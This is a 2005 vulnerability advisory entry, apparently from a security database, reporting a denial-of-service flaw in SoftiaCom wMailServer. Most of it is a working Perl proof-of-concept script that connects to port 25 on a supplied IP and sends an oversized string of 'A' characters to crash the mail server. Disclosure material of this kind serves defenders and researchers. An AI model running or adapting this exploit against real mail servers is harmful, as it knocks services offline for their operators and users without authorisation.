SoftiaCom MailServer v2.0 - Denial Of Service

2005-07-13T00:00:00
ID SECURITYVULNS:DOC:9157
Type securityvulns
Reporter Securityvulns
Modified 2005-07-13T00:00:00

Description

SoftiaCom MailServer v2.0 - Denial Of Service

Software: wMailServer Corporation: SoftiaCom Software Version: v1.0 (v2.0 is the same...) Vulnerability: Denial of Service


BACKGROUND


SoftiaCom design and build software utilities in communication and network server.

WMailserver is an internet email server able to listin in the appropriate mail port to fetch incoming emails from the net. You can add users and manage them, avoid spam.

Source: www.softiacom.com

Proof of Concept


!/usr/bin/perl

-----------------------------------------------------

Vulnerability: Denial Of Service - Crash

Discovered on: July 9, 2005

Coded by: fRoGGz - SecuBox Labs

Severity: Normal

-----------------------------------------------------

$boulet = $ARGV[0];

use IO::Socket; print "\n\nSoftiaCom Software - wMailServer v1.0\r\n"; print "Denial Of Service - Crash Vulnerability\r\n"; print "---------------------------------------------\r\n"; print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n"; if(!$ARGV[0]) { die "Utilisation: ./wms_poc.pl <ip>\n"; }

print "[ ] Connexion sur $boulet\n"; my($suckette) = ""; if ($suckette = IO::Socket::INET->new(PeerAddr => $boulet,PeerPort => "25",Proto => "TCP")) { print $suckette " " . "\x41" x 539 . "\r\n"; print "[ ] Emission du paquet malicieux ...\n"; sleep 2; close $suckette; print "[ ] Mission termin&#233;e !\n\n"; } else { print "[-] Impossible de se connecter sur $boulet\n"; }